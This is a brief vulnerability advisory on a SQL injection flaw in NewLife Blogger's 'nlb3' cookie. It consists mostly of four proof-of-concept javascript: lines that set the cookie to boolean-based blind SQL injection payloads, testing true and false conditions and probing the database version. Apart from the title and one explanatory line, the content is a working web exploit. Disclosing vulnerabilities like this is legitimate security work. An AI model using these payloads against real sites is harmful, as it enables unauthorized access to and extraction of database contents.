NewLife Blogger 'nlb3' Cookie SQL Injection Vulnerability

NewLife Blogger 'nlb3' Cookie SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proofs of concept are available:

javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112"
javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112"
javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112
javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112